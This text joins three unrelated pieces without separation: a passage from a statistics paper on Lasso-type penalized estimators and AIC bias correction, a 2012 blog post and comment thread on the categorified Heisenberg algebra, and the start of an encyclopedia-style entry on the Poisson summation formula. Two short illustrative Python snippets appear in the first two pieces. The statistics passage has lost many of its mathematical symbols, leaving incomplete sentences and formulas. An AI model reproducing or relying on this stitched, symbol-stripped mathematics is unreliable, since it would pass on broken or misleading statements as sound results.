the same way as in the case of (see Section A.4 for details). From Theorem 1, the estimator in (2) is shown to converge in distribution to some function of a Gaussian distributed random variable. When , we immediately see that it is 0 or the Gaussian distributed random variable itself, and this simple fact is useful for deriving an information criterion explicitly and reducing the computational cost of model selection. On the other hand, when , we can prove weak convergence, since the convex objective function in (18) converges uniformly from the convexity lemma in Hjort and Pollard (1993). Corollary 1. Let be a Gaussian distributed random variable with mean and covariance matrix and ^u(1)=argminu(1){u(1)TJ(1|2)u(1)/2−u(1)Tτλ(s)+λ∥u(1)∥1}. (21) Then, under the same conditions as in Theorem 1, we have n1/(2q)^β(1)λ\lx@stackreld→0andn1/2(^β(2)λ−β∗(2))\lx@stackreld→J(22)−1(s(2)−p′(2)λ) when , and we have n1/2^β(1)λ\lx@stackreld→^u(1)andn1/2(^β(2)λ−β∗(2))\lx@stackreld→−J(22)−1J(21)^u(1)+J(22)−1(s(2)−p′(2)λ) when . In the case of , we still need to solve the minimization problem in (21) for evaluating the AIC, but this is easy because the objective function is convex with respect to , so we can use existing convex optimization techniques. It is known that the proximal gradient method (Rockafellar 1976; Beck and Teboulle 2009) is effective for solving such a minimization problem when the objective function is the sum of a differentiable function and a non-differentiable function. We will use, however, the coordinate descent method (Mazumder et al. 2011) because the objective function can be minimized explicitly for each variable. Actually, when we fix all the elements of except for the -th one, is given by ^u(1)j=1J(1|2)jjsgn⎛⎝τj−∑k≠jJ(1|2)jk^u(1)k⎞⎠max⎧⎨⎩∣∣ ∣∣τj−∑k≠jJ(1|2)jk^u(1)k∣∣ ∣∣−λ,0⎫⎬⎭. 
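As an illustration of the coordinate-wise minimizer just displayed, here is a hedged sketch of the cyclic coordinate descent scheme for the convex problem in (21); the names `coordinate_descent`, `J`, and `tau` are illustrative stand-ins for the matrix written as $J^{(1|2)}$ and the vector written as $\tau_\lambda(s)$ in the text, not code from the paper. Cycling this update until convergence is exactly what the next paragraph describes.

```python
import numpy as np

def soft_threshold(z, lam):
    """sgn(z) * max(|z| - lam, 0)."""
    return np.sign(z) * np.maximum(np.abs(z) - lam, 0.0)

def coordinate_descent(J, tau, lam, tol=1e-10, max_iter=1000):
    """Cyclic coordinate descent for
        min_u  u^T J u / 2 - u^T tau + lam * ||u||_1,
    using the closed-form single-coordinate minimizer quoted above.
    J is assumed symmetric positive definite, tau a vector of the same length."""
    u = np.zeros_like(tau)
    for _ in range(max_iter):
        u_old = u.copy()
        for j in range(len(tau)):
            # partial residual: tau_j minus the off-diagonal contributions
            r_j = tau[j] - J[j].dot(u) + J[j, j] * u[j]
            u[j] = soft_threshold(r_j, lam) / J[j, j]
        if np.max(np.abs(u - u_old)) < tol:
            break
    return u

# toy example with a small positive-definite J
rng = np.random.default_rng(0)
A = rng.normal(size=(5, 3))
J = A.T @ A + 0.5 * np.eye(3)
tau = rng.normal(size=3)
print(coordinate_descent(J, tau, lam=0.3))
```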
Then, for the -th step in the algorithm, we have only to update as follows: u(t+1)j=argminuh(u(t+1)1,u(t+1)2,…,u(t+1)j−1,u,u(t)j+1,u(t)j+2,…,u(t)|J(1)|), for , and we repeat this update until converges. Note that the optimal value satisfies if and otherwise. 4 Information criterion From the perspective of prediction, model selection using the AIC aims to minimize twice the Kullback-Leibler divergence (Kullback and Leibler 1951) between the true distribution and the estimated distribution, 2~E[n∑i=1~gi(β∗)]−2~E[n∑i=1~gi(^βλ)], where is a copy of ; in other words, has the same distribution as and is independent of . In addition, and denote a log-likelihood function based on , that is, , and the expectation with respect to only , respectively. Because the first term is a constant, i.e., it does not depend on the model selection, we only need to consider the second term, and then the AIC is defined as an asymptotically biased estimator for it (Akaike 1973). A simple estimator of the second term in our setting is , but it underestimates the second term. Consequently, we will minimize the bias correction, −2n∑i=1gi(^βλ)+2E[n∑i=1gi(^βλ)−~E[n∑i=1~gi(^βλ)]], (22) in AIC-type information criteria (see Konishi and Kitagawa 2008). Because the expectation in (22), i.e., the bias term, depends on the true distribution, it cannot be explicitly given in general; thus, we will evaluate it asymptotically in the same way as was done for the AIC. For the Lasso, Efron et al. (2004) and Zou et al. (2007) developed the -type information criterion as an unbiased estimator of the prediction squared error in a Gaussian linear regression setting, in other words, a finite correction of the AIC (Sugiura 1978) in a Gaussian linear setting with a known variance. For the Lasso estimator , it can be expressed as n∑i=1{(yi−Xi^βλ)TV[yi]−1(yi−Xi^βλ)+log|2πV[yi]|}+2|{j;^βλ,j≠0}|, where the index set is called an active set. Unfortunately, since Stein’s unbiased risk estimation theory (Stein 1981) was used for deriving this criterion, it was difficult to extend this result to other models. In that situation, Ninomiya and Kawano (2014) relied on statistical asymptotic theory and extended the result to generalized linear models based on the asymptotic distribution of the Lasso estimator. The Lasso estimator in their paper is defined by ^βλ=argminβ∈B{−n∑i=1gi(β)+nλ∥β∥1}, but, as was mentioned in the previous section, estimation consistency is not assured because the order of the penalty term is . In this study, we derive an information criterion in a setting that estimation consistency holds as in Lemma 2 for not only the Lasso but also the non-concave penalized likelihood method. The bias term in (22) can be rewritten as the expectation of n∑i=1{gi(^βλ)−gi(β∗)}−n∑i=1{~gi(^βλ)−~gi(β∗)}, (23) so we can derive an AIC by evaluating , where is the limit to which (23) converges in distribution. We call an asymptotic bias. Here, we will develop an argument by setting . Using Taylor’s theorem, the first term in (23) can be expressed as (^βλ−β∗)Tn∑i=1g′i(β∗)+(^βλ−β∗)Tn∑i=1g′′i(β†)(^βλ−β∗)/2, (24) where is a vector on the segment from to . Note that
## July 10, 2012 ### Morton and Vicary on the Categorified Heisenberg Algebra #### Posted by John Baez Wow! It’s here! Back when I was working with Jeffrey Morton on categorifying the harmonic oscillator, I discovered to my surprise that there was another guy, a student of Chris Isham named Jamie Vicary, who was also categorifying the harmonic oscillator, using different but related ideas. Luckily, they started to collaborate… and they discovered some quite wonderful things. In quantum mechanics, position times momentum does not equal momentum times position! This sounds weird, but it’s connected to a very simple fact. Suppose you have a box with some balls in it, and you have the magical ability to create and annihilate balls. Then there’s one more way to create a ball and then annihilate one, than to annihilate one and then create one. Huh? Yes: if there are, say, 3 balls in the box to start with, there are 4 balls you can choose to annihilate after you’ve created one but only 3 before you create one. In quantum mechanics, when you’re studying the harmonic oscillator, it’s good to think about operators that create and annhilate… not balls, but ‘quanta of energy’. The creation operator is called $a^\dagger$ and the annihilation operator is called $a$, and the argument I just sketched can be used to show that $a a^\dagger = a^\dagger a + 1$ It’s a wonderful fact that you can express the position $q$ and momentum $p$ of the oscillator in terms of these creation and annihilation operators: $q = \frac{a + a^\dagger}{\sqrt{2}} , \qquad p = \frac{a - a^\dagger}{\sqrt{2} \, i}$ So the fact that position and momentum don’t commute, but instead obey $p q - q p = -i$ (in units where Planck’s constant is 1) can be seen as coming from the more intuitive fact that the annihilation and creation operators don’t commute, but instead obey $a a^\dagger - a^\dagger a = 1$ This insight, that funny facts about quantum mechanics are related to simple facts about balls in boxes, allows us to ‘categorify’ a chunk of quantum mechanics—including the Heisenberg algebra, which is the algebra generated by the position and momentum operators. Now is not the time to explain what that means. The important thing is that Mikhail Khovanov figured out a seemingly quite different way to categorify the same chunk of quantum mechanics, so there was a big puzzle about how his approach relates to the one I just described. Jeffrey Morton and Jamie Vicary have solved that puzzle. The big spinoff is this. Khovanov’s approach showed that in categorified quantum mechanics, a bunch of new equations are true! These equations are ‘higher analogues’ of Heisenberg’s famous formula $p q - q p = -i$ So, these new equations should be important! But they look very mysterious at first: In fact, when I first saw them, it seemed as if Khovanov had just plucked them randomly from thin air! Of course he had not: they arose from the representation theory of symmetric groups. But their intuitive meaning was far from transparent. Now Jeffrey and Jamie have shown how to get these equations just by thinking about balls in boxes. The equations in fact make perfect sense! See Section 2.8: Combinatorial Interpretation for details. Let me just get you started. 
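Before the categorified version, a quick numerical aside (mine, not from the post or the paper): truncating the harmonic-oscillator creation and annihilation operators to an $N$-level matrix representation reproduces the relations above everywhere except at the truncation edge, which is a handy sanity check.

```python
import numpy as np

N = 12                                   # truncation level (finite stand-in for Fock space)
n = np.arange(1, N)
a = np.diag(np.sqrt(n), k=1)             # annihilation: a|n> = sqrt(n)|n-1>
adag = a.T                               # creation

comm = a @ adag - adag @ a               # should be the identity
q = (a + adag) / np.sqrt(2)
p = (a - adag) / (np.sqrt(2) * 1j)
heis = p @ q - q @ p                     # should be -i times the identity

# Truncation spoils the relations only in the highest-occupation corner,
# so compare everything except the last row and column.
print(np.allclose(comm[:-1, :-1], np.eye(N)[:-1, :-1]))          # True
print(np.allclose(heis[:-1, :-1], -1j * np.eye(N)[:-1, :-1]))    # True
```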
We should replace the equation $a^\dagger a + 1 = a a^\dagger$ by an isomorphism $a^\dagger a + 1 \stackrel{\sim}{\Rightarrow} a a^\dagger$ This provides a one-to-one correspondence between ‘ways to annihilate a ball and then create one… together with one more thing’ and ‘ways to create a ball and then annihilate it’. This isomorphism is built from two parts: $f: a^\dagger a \Rightarrow a a^\dagger$ and $g: 1 \Rightarrow a a^\dagger$ The thing I’m calling $f: a^\dagger a \Rightarrow a a^\dagger$ says how every way to annihilate a ball (say the ball $x$) and then create a different one (say $y \ne x$) gives a way to create one (namely $y$) and then annihilate one (namely $x$). The thing I’m calling $g: 1 \Rightarrow a a^\dagger$ says how there is one other way to create a ball and then annihilate one: namely, by annihilating the same ball we just created! The five equations shown in the picture above are then a clever graphical way of describing basic facts about the morphisms $f$ and $g$ and two others which are a bit subtler to describe. These others, which deserve to be called $f^\dagger: a a^\dagger \Rightarrow a^\dagger a$ and $g^\dagger : a a^\dagger \Rightarrow 1$ do not give functions that send one way to do things to another. Instead, they give relations. You can’t ‘turn around’ a function and get a function going the other way unless it’s invertible. But you can turn around a function and get a relation going the other way. I’ve hit the limit on what I can explain without getting more serious and ruining the light-hearted, easy-going tone of this post. If you want details, I’d rather just let you read the paper! But I’d like to say a few fancier things, just for the experts. In reality, what matters most for Jeffrey and Jamie are not sets and relations, but groupoids and spans of groupoids. Spans of groupoids allow you to ‘turn around’ a functor between groupoids. In our old work on categorifying quantum mechanics, Jeffrey and I used the bicategory of • groupoids, • spans of groupoids, • isomorphism classes of maps of spans of groupoids. Recently Alex Hoffnung has shown this is a monoidal bicategory—in fact part of a monoidal tricategory if you don’t wimp out and take isomorphism classes at the 2-morphism level, as I just did. (Alex, to his credit, did not.) Mike Stay has gone further and shown it’s a compact closed symmetric monoidal bicategory. As I said, spans of groupoids let you ‘turn around’ a functor between groupoids, like $h: X \to Y$ and get something going the other way, which we denote with a dagger: $h^\dagger : Y \to X$ This is how we construct the annihilation operator $a^\dagger$ starting from the creation operator $a$ in categorified quantum mechanics. But to define 2-morphisms like $f^\dagger$ and $g^\dagger$ above, Jeffrey and Jamie need to turn around maps of spans of groupoids. And to do this, we need spans of spans of groupoids. So they need a monoidal bicategory like this: • groupoids, • spans of groupoids, • isomorphism classes of spans of spans of groupoids. They show that the equations in Khovanov’s categorified Heisenberg algebra follow from equations between 2-morphisms here… which have nice combinatorial interpretations in terms of balls in boxes! It would be interesting to see what happens if we go even further. We don’t really need to stop at spans of spans. 
We could keep on going forever, as noted in the famous Monte Python song: Span, span, span, span, span, span, span, span… If we went one notch further we could categorify our categorified Heisenberg algebra and get a 2-categorified Heisenberg algebra. We would find that the equations relating $f, g, f^\dagger$ and $g^\dagger$ became isomorphisms, and we could work out what equations those isomorphisms and their daggers satisfy! The important thing is this: those equations are not something we get to choose, or make up. They are what they are, and they’re just sitting there waiting for us to discover them. It could be that these higher equations are trivial for some reason. That would be interesting: it would mean that Khovanov’s categorified Heisenberg algebra is the end of the story, not the tip of an even deeper iceberg. Or, maybe these equations are nontrivial! That would be even more interesting! Of course, there’s also a lot to think about without categorifying further. What if any physical meaning do the relations in the categorified Heisenberg algebra have? Can we actually do something like physics with some categorified version of quantum theory? Or is this stuff mainly good for understanding the representation of symmetric groups in a deeper way, using combinatorics? That would already be very interesting. And so on… Posted at July 10, 2012 9:16 AM UTC TrackBack URL for this Entry:   http://golem.ph.utexas.edu/cgi-bin/MT-3.0/dxy-tb.fcgi/2540 ### Re: Morton and Vicary on the Categorified Heisenberg Algebra One comment I’d like to add is that what we have here is, as our title implies, a combinatorial “representation” of Khovanov’s categorification. That is, we have a functor from the monoidal category $H$ whose morphisms are those diagrams (which we think of as a 2-category with one object) into the 2-category $Span(Gpd)$, where the one object is taken to the groupoid of finite sets and bijections. Since the morphisms of $Span(Gpd)$ aren’t functors or maps, it’s not exactly what people often mean by a “categorified representation”, which would be an action on a category in terms of functors and natural transformations. We do talk about how to get one of these on a 2-vector space out of our groupoidal representation toward the end. So in some sense, Khovanov’s category of diagrams is a universal theory of what a categorification of the Heisenberg algebra must look like, and the combinatorial representation is a particular model of that theory. It’s one which happens to have a nice combinatorial story in which the relations John quoted are easy to see. Posted by: Jeffrey Morton on July 10, 2012 2:48 PM | Permalink | Reply to this ### Heisenberg Lie 2-algebra 1. The ordinary Heisenberg algebra is a Lie algebra, which is a sub-Lie algebra of the corresponding Poisson bracket Lie algebra. 2. The usual higher analog of a Lie algebra is a Lie 2-algebra. A Poisson bracket Lie 2-algebra has been introduced by Chris Rogers. I regard his work, as well as the considerations in the other thread, as robust evidence that this is a natural definition in 2-dimensional quantum field theory. 3. Inside the Poisson bracket Lie $2$-algebra sits the Heisenberg Lie 2-algebra. And generally, inside any Poisson-bracket Lie $n$-algebra over an $n$-plectic vector space sits the corresponding Heisenberg Lie $n$-algebra. So the evident question is: 1. Can you extract a Lie 2-algebra from the Heisenberg 2-algebra that you consider? 2. How might it be related to Chris Rogers’ Heisenberg Lie 2-algebra? 
Posted by: Urs Schreiber on July 10, 2012 4:45 PM | Permalink | Reply to this ### Re: Heisenberg Lie 2-algebra I don’t have much to say about Urs’ question, though I understand why it’s interesting. I hope Jamie or Jeffrey gives it a try! Just two points: • The categorified Heisenberg algebras I’m talking about can be constructed starting just from a symplectic vector space $(V,\omega)$ together with a basis obeying the canonical relations $\omega(p_i, p_j) = \omega(q_i, q_j) = 0$ $\omega(p_i, q_j) = \delta_{ij}$ There is no 2-plectic structure involved, as far as I can see. • Khovanov’s categorified Heisenberg algebra has its underlying 2-vector space a Kapranov–Voevodsky 2-vector space, while the Lie 2-algebras you’re talking about have as their underlying 2-vector space a Baez–Crans 2-vector space. Morton and Vicary’s categorified Heisenberg algebra has as its underlying ‘2-vector space’ a groupoid-–simply the groupoid of finite sets! A key step in their reasoning is a 2-functor that turns groupoids into Kapranov–Voevodsky 2-vector spaces. They call this ‘2-linearization’. It turns out to send the groupoid of finite sets to the Kapranov–Voevodksy 2-vector space that has one basis element for each Young diagram. These make it seem hard to find a nice relation between Chris Rogers’ Heisenberg Lie 2-algebra and the categorified Heisenberg algebras of Khovanov and Morton–Vicary. Besides, I think of the first as ‘dimension-boosting’, going from point particles to strings, and the second as ‘peering more deeply into the combinatorial heart’ of quantum mechanics for point particles. They don’t seem to be moving in the same direction. I suppose one could try to combine them! It’s not a very profound approach to mathematics, taking two ideas whose relation one doesn’t understand and trying to combine them. But… Maybe we could get some clues. Has Khovanov invented a ‘categorified Virasoro algebra’ yet, or categorified other famous algebras associated to string theory? I can easily imagine him giving it a try. In fact, I bet he or his followers have categorified universal enveloping algebras of affine Lie algebras, and their $q$-deformations. Posted by: John Baez on July 10, 2012 6:00 PM | Permalink | Reply to this ### Re: Heisenberg Lie 2-algebra I also can’t answer Urs’ question at the moment, though I would like to understand more about $n$-plectic structures and the other ingredients thereof. But certainly, the later part of our paper really uses that that the 2-vector space we eventually get is a KV 2-vector space, not a BC 2-vector space. Khovanov’s construction doesn’t explicitly talk about a KV 2-v.s. it acts on, because it’s mostly doing the categorified version of describing the algebra rather than a particular representation. There is some material that uses a particular representation in a category he calls $S$, where the objects of the categorified algebra are represented by bimodules and diagrams by particular bimodule maps. That’s basically equivalent to the KV 2-v.s. we get by 2-linearization, since the bimodules are all associated to the induction/restriction functors that we get for our spans. However, I can imagine there’s some sort of analogous “2-linearization” that gives a BC 2-v.s. for any groupoid, or at least discrete, locally finite ones such as we have here: linearizing the sets of objects and morphisms (in the covariant way) would be an obvious guess. Whether this gets anywhere toward the question, I’m not sure. 
As for categorifying these other algebras - there’s a really big literature on this, but for example there’s Rouquier’s paper which describes how to categorify the Kac-Moody algebras associated to a given Cartan datum… And lots of other work, likewise pretty general, and typically done in the q-deformed setting. Our approach links one corner of this world to groupoidification, but we don’t talk about the q-deformed versions. (I think this can probably be done, somewhat along the lines of the groupoidification of the Hecke algebra, but it’s not in our paper). I guess I would also point out that our combinatorial interpretation - the groupoid picture - gives a model of Khovanov’s $H'$, but one needs to go to the 2-linearized setting to get all the various subobjects he mentions in $H = Kar(H')$, the Karoubi envelope. We do this a bit briefly, because it gets away from the combinatorics, and there’s not a lot more to say than what was already in Khovanov’s work. What $H$ categorifies would seem to also go by the name “Heisenberg Vertex Algebra”, which is bigger than just the usual Heisenberg algebra. So this is already touching on categorifying at least a simple vertex algebra… Posted by: Jeffrey Morton on July 11, 2012 1:18 PM | Permalink | Reply to this ### Re: Heisenberg Lie 2-algebra there’s a really big literature on this, but for example there’s Rouquier’s paper which describes how to categorify the Kac-Moody algebras I have collected some references at quantum affine algebra. What H categorifies would seem to also go by the name “Heisenberg Vertex Algebra”, Hm, so $H$ is as in your article? You are saying it categorifies a vertex algebra after all? Or what do you mean? Posted by: Urs Schreiber on July 13, 2012 3:45 AM | Permalink | Reply to this ### (k,n)-vector spaces A comment on the notion of higher vector spaces: the KV definition is not really on par with the BC definition: • the KV notion is a very restricted notion of (2,2)-vector spaces, • the BC notion is the general notion of (2,1)-vector space (both over the given ground field $k$). The general situation is this: • pick some commutative $\infty$-ring $k$ (can be modeled by an $E_\infty$-ring); • write $Mod_k$ for the $(\infty,1)$-category of $\infty$-modules over $k$ (can be modeled by $E_\infty$-modules); the objects in here are “$(\infty,1)$-vector spaces” over $k$; • write $2 Mod_k$ for the $(\infty,2)$-category whose • objects are algebra objects $A$ in $Mod_k$ (to be thought of as placeholders for their $(\infty,1)$-category $Mod_A$ of modules); • morphisms are bimodule objects $N$ in $Mod_k$ (to be thought of as placeholders for $k$-linear functors $(-) \otimes_A N : Mod_A \to Mod_B$); • generally for $n \gt 1$, by induction, write $n Mod_k$ for the $(\infty,n)$-category whose • objects are algebra objects $A$ in $(n-1)Mod_k$; • morphisms are bimodule objects in $(n-1)Mod_k$; In this general pattern, the cases discussed here are the following: • the ground $\infty$-ring $k$ is an ordinary field. • $Mod_k$ is the $(\infty,1)$-category of chain complexes of $k$-modules. A general element in here is a $(\infty,1)$-vector space over $k$. In particular a BC-vector space is a 1-truncated such object, hence a $(2,1)$-vector space. • $2 Mod_k$ is the $(\infty,2)$-category whose objects are given by dg-algebras, and whose morphisms are given by dg-bimodules. • consider the ordinary algebras $k^{\oplus n}$, regarded trivially as a dg-algebra. The corresponding object in $2 Mod_k$ is the KV-2-vector space of dimension $n$. 
nLab: (∞,n)-vector space Posted by: Urs Schreiber on July 11, 2012 5:45 PM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra Typo: “the position operator is called a” – should be “annihilation operator” Posted by: Stuart Presnell on July 10, 2012 7:30 PM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra Oh, and presumably “Monte Python” is a uniform random sampling from a population of snakes? Posted by: Stuart Presnell on July 10, 2012 7:40 PM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra Thanks, I’ll fix that typo. Did you know that as you increase the size of a random sample until it converges to the actual distribution its chosen from, you get the ‘full Monte’? Posted by: John Baez on July 11, 2012 3:42 AM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra “funny facts about quantum mechanics are related to simple facts about balls in boxes” While it’s clearly true that the same mathematical relation holds between the two pairs of operations, how seriously can we take this analogy physically? I mean, the relation only holds for macroscopic objects because they’re distinguishable. That’s the only sense in which there are 4 (distinct) ways to remove a ball from a box with 4 balls in. If the objects were indistinguishable (by which I suppose I mean: if they’re not to be counted as distinct entities each with their own identity) then this wouldn’t work. So for example, if you have 4 $10 bills in your wallet, then there are 4 distinct ways to remove one, because each bill is an individual entity with its own distinguishing characteristics. But the dollars in your bank account are fungible, so if you have$40 in your account there aren’t 4 distinct ways to withdraw $10 from it to reduce it to$30. In short: the “ways to remove a thing” are only as distinct as the “things” themselves! [Side note: we might also consider intermediate cases in which the symmetry on the objects is something between “all are distinct” and “all are interchangeable”. Then presumably the relation between (remove add) and (add remove) depends in a more complicated way on the symmetry acting on the things.] But the creation and annihilation operators for quanta do satisfy the above relation, which seems to suggest that quanta behave more like dollar bills than bank-account dollars – i.e. that they have their own identities, rather than being fungible. But that’s really weird, and exactly opposite to what I’d expect! So what’s going on here? Is it just a misleading coincidence that the same mathematical relation holds for the creation and annihiliation operators as holds for balls and dollar bills? Or does this relation tell us that quanta of energy should be thought of – quite counter-intuitively – as having distinct identities? Posted by: Stuart Presnell on July 10, 2012 8:53 PM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra You may be just discussing the difference between Fermi-Dirac statistics which apply to distinguishable fermions and Bose-Einstein statistics which apply to indistinguishable bosons. Posted by: RodMcGuire on July 10, 2012 10:34 PM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra Actually Stuart is discussing the difference between Bose–Einstein statistics and Maxwell–Boltzmann statistics. 
Bose–Einstein statistics apply to bosons: indistinguishable particles that transform according to the trivial representation of the symmetric group $S_n$ on $S^n H$, the $n$th symmetric tensor power of the single-particle Hilbert space $H$. Maxwell–Boltzmann statistics apply to boltzons: distinguishable particles, which transform according to the permutation representation of $S_n$ on $H^{\otimes n}$, the $n$th tensor power of $H$. People don’t talk about boltzons very much because we don’t know any particles that act exactly like boltzons when we take quantum mechanics into account. But in certain ‘classical limits’ Maxwell–Boltzmann statistics work well. For classical balls in a box, they’re just right. To answer Stuart: I understand your puzzlement! I was completely shocked when I realized that we can use the mathematics of Fock space, including the commutation relations $a a^\dagger - a^\dagger a = 1$ for boltzons as well as bosons. The big difference is that we normalize states a different way, because the states describe probability distributions rather than wavefunctions. This is what I’ve been working on for the last year, and I’m writing a little book on it with Jacob Biamonte, tentatively called Quantum Techniques for Stochastic Processes. Posted by: John Baez on July 11, 2012 3:58 AM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra I agree this is weird. The sense I have, after playing with this for a few years on and off, is that this analogy isn’t physically meaningless, but it’s not obvious how literally to take it. So it might possibly make this clearer to understand that not only do the commutation relations for balls-in-boxes and for the harmonic oscillator look similar formally, they arise for very similar reasons. This isn’t in our current paper, by the way, but it will be an important part of the second installment, tentatively subtitled “Models on Free Structures”, and is mentioned briefly in this talk I gave at the Higher Structures workshop last year. It’s also the part of this project which really uses the formal analysis of the harmonic oscillator which Jamie Vicary did in the paper John linked to above, A categorical framework for the quantum harmonic oscillator. So, to recap how one gets the Fock space for the harmonic oscillator… Start with the Hilbert space for a particle with no particular features - namely just $\mathbb{C}$. There is only one state here, in the sense of a ray in the Hilbert space, so this system is a “particle” of which the only thing to say about it is that it’s there. The bosonic Fock space is then $\oplus_n \mathbb{C}^{\otimes_s n}$, the direct sum of all symmetric tensor products of some number of copies of this space. One way to say this is that the symmetric tensor product of a space $V$ with itself is the equalizer of two maps $V \otimes V \rightarrow V \otimes V$, namely the identity and the swap map. Likewise, $V^{\otimes_s n}$ is the equalizer of all the permutation automorphisms that appear because $V^{\otimes n}$ is automatically a representation of $S_n$. So the symmetric product is the trivial representation. Since $\mathbb{C}^{\otimes_s n} \cong \mathbb{C}$, this is just a sum of a bunch of 1-dimensional spaces, each of which describes an $n$-particle system, which again has only one state. The only thing to say about this state is that it has $n$ particles in it. 
Jamie’s original paper explains this by means of a monad on $Hilb$, which is essentially the “free commutative monoid” monad: the Fock space is the free commutative monoid on $\mathbb{C}$. This fact gives a bunch of special maps, including a bialgebra structure on the Fock space, and the raising and lowering operators can be constructed out of this. The commutation relations are a consequence of that. Now, groupoidifying this is a categorification, so this description has to be weakened. To start with, we take a groupoid describing a system with only one configuration (the “it’s there” state for our particle). This will be the trivial groupoid $\mathbf{1}$, with one object and only the identity morphism. Then we want to take the “groupoidified Fock space”. Since groupoids live in a 2-category, the equivalent of the “free commutative monoid” monad turns out to be a bit weaker, namely the “free symmetric monoidal category” 2-monad. We get a “direct sum” (i.e. in $Span(Gpd)$, the disjoint union) of a bunch of objects which show up as certain 2-limits. In particular, we freely generate a bunch of objects like $(\mathbb{1} \otimes ... \otimes \mathbb{1})$, and we must get not EQUATIONS, but ISOMORPHISMS corresponding to all the switch maps. This is essentially where the groupoid of finite sets and bijections come from: think of $\mathbb{1}$ as the groupoid which contains exactly the 1-element set - the free symmetric monoidal category this generates is the groupoid which contains all finite sets and their bijections. All the structure which appeared in the construction of Fock space also appears here - and the things which correspond to raising and lowering operators are exactly what we intuitively describe as “put a ball in” and “take a ball out” (i.e. functors which add or remove elements of any given set). The categorified commutation relations then hold for the same sort of reasons as before. The picture in $Hilb$ is then related to the picture in $Span(Gpd)$ by the degroupoidification functor, which gets along with all the structures involved. The fact that degroupoidification assigns a vector space to a groupoid which consists of invariant functions on the groupoid necessarily means that it produces the trivial representation of all those symmetric groups. One could probably get a fermionic Fock space by forcibly turning the groupoid of finite sets into a super-groupoid, where the odd permutations have a negative sign, and changing the degroupoidification functor accordingly. In fact, the 2-vector space which we assign to the groupoid actually consists of all representations - so in some sense the weakening of the symmetry in the construction of Fock space makes it indeterminate what statistics the particles have. The bosonic representations are all in there, though. (Note also that there’s no reason that we have to start with the trivial groupoid for this process to make sense - it’s just the choice that gives the harmonic oscillator and the Heisenberg algebra we’re looking for. The end result will then involve also the representation theory of whatever groupoid one starts with, as well as the symmetric groups.) So the fact that this all works is not merely a coincidence - but this sort of formal description obviously can’t settle whether or not the non-coincidence is also physically relevant. Short version: yes, that’s weird. I don’t know how seriously to take it. 
Posted by: Jeffrey Morton on July 11, 2012 2:07 PM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra I guess, to relate the above to what John said: turning “Bosons” into “Boltzons” is what we should expect from a categorification, which weakens equations to isomorphisms. Turning “Boltzons” into “Bosons” is a particular property of degroupoidification. So I would look at that part to see if there’s actually physical significance to this stuff. Is there anything about how we set about observing physical systems which explains this property of degroupoidification? Posted by: Jeffrey Morton on July 11, 2012 2:13 PM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra I don’t know exactly why, but putting the words “observation” and “degroupoidification” in the same sentence feels right. Posted by: Eric on July 11, 2012 3:18 PM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra This is very nice! I have always been unsatisfied by the way quantum group theorists go about “categorifying” things by just writing down a bunch of generators and relations in picture form. So it’s great to see how a natural categorification arises from simple combinatorics, and factors the generators-and-relations categorification by way of string diagram calculus. I look forward to hearing how the $q$-deformed version goes! Posted by: Mike Shulman on July 12, 2012 9:25 PM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra What do you do if your quantum system has finite Hilbert-space dimension? In the combinatorial picture discussed here, we can always drop another marble into the bag: we can keep applying the creation operator $a^\dag$ as many times as we like. Whether we get probabilities for bosons or boltzons in the end, we can have an arbitrary large number of them. But what if there’s a ceiling on the occupation number? I’ve seen people who try to do stochastic mechanics with bounded occupation numbers go about it in a couple different ways. One is to put in something like an exponential decay factor, so that while in principle the occupation number (the number of fish living in a pond, for example) could grow bigger and bigger, the probability of its doing so drops off, so populations sizes beyond some “carrying capacity” aren’t likely enough to worry about. Here’s an example: • U. C. Täuber (2012), “Population oscillations in spatial stochastic Lotka–Volterra models: A field-theoretic perturbational analysis” arXiv:1206.2303 [cond-mat.stat-mech]. Another way is to use anticommuting spin operators instead. An example which I just saw today (and which brought this line of thought to mind) is the following: • F. Bagarello and F. Oliveri (2012), “A phenomenological operator description of interactions between populations with applications to migration” arXiv:1207.2873 [physics.bio-ph]. Is there something like a stuff operator whose decategorification is a Pauli operator $\sigma_i$? Or, more generally, a displacement operator in the Weyl–Heisenberg group for dimension $d$? (For some values of $d$ at least, there are interesting geometrical pictures for the Weyl–Heisenberg group: for example, applying the group elements to a “fiducial vector” in Hilbert space produces a set of states which is analogous to a dual affine plane of order $d$.) Posted by: Blake Stacey on July 13, 2012 3:29 AM | Permalink | Reply to this Post a New Comment
# Poisson summation formula

In mathematics, the Poisson summation formula is an equation that relates the Fourier series coefficients of the periodic summation of a function to values of the function's continuous Fourier transform. Consequently, the periodic summation of a function is completely defined by discrete samples of the original function's Fourier transform. And conversely, the periodic summation of a function's Fourier transform is completely defined by discrete samples of the original function. The Poisson summation formula was discovered by Siméon Denis Poisson and is sometimes called Poisson resummation.

## Contents

• Forms of the equation
• Distributional formulation
• Derivation
• Applicability
• Applications
  • Method of images
  • Sampling
  • Ewald summation
  • Lattice points in a sphere
  • Number theory
• Generalizations
  • Selberg trace formula
• Notes
• References

## Forms of the equation

For appropriate functions $f$, the Poisson summation formula may be stated as:

$$\sum_{n=-\infty}^\infty f(n)=\sum_{k=-\infty}^\infty \hat f\left(k\right),$$     (Eq.1)

where $\hat f$ is the Fourier transform[note 1] of $f$; that is, $\hat f(\nu) = \mathcal{F}\{f(x)\}$.

With the substitution $g(xP)\ \stackrel{\text{def}}{=}\ f(x)$ and the Fourier transform property $\mathcal{F}\{g(x P)\} = \frac{1}{P} \cdot \hat g\left(\frac{\nu}{P}\right)$ (for $P > 0$), Eq.1 becomes:

$$\sum_{n=-\infty}^\infty g(nP)=\frac{1}{P}\sum_{k=-\infty}^\infty \hat g\left(\frac{k}{P}\right)$$     (Stein & Weiss 1971). (Eq.2)

